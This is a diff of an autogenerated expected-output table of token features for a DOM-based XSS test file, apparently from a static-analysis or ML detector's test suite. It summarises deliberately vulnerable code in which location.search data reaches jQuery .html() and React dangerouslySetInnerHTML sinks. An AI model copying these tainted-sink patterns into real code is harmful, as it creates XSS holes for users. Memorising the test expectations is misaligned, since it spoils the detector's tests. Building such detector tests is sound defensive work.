URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | exceptional return of $('myId ... ainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | exceptional return of $('myId ... ainted) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | exceptional return of $('myId ... ainted) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:13:228:49 | exceptional return of $('myId ... ainted) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17014,6 +117823,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:228:15:228:20 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:23:228:26 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:23:228:26 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:23:228:26 | html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:23:228:26 | html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:23:228:26 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:31 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:31 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:31 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:31 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:31 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:37 | this.props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:37 | this.props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:37 | this.props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:37 | this.props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:28:228:37 | this.props | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17021,6 +117845,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:228:28:228:48 | this.pr ... Tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:33:228:37 | props | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:33:228:37 | props | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:33:228:37 | props | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:33:228:37 | props | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:33:228:37 | props | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:228:39:228:48 | notTainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:228:39:228:48 | notTainted | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:228:39:228:48 | notTainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:228:39:228:48 | notTainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:228:39:228:48 | notTainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:16 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:16 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:16 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:16 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:16 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:25 | this.setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:25 | this.setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:25 | this.setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:25 | this.setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:230:25 | this.setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | exceptional return of this.se ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | exceptional return of this.se ... }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | exceptional return of this.se ... }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | exceptional return of this.se ... }) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | exceptional return of this.se ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | this.se ... }) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | this.se ... }) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | this.se ... }) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | this.se ... }) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:13:232:14 | this.se ... }) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:18:230:25 | setState | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:18:230:25 | setState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:230:18:230:25 | setState | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:18:230:25 | setState | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:18:230:25 | setState | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | 'arguments' object of anonymous function | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | 'arguments' object of anonymous function | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | 'arguments' object of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | CalleeFlexibleAccessPath | this.setState | | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17028,6 +117892,61 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | (prevSt ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:230:27:232:13 | exceptional return of anonymous function | contextFunctionInterfaces | 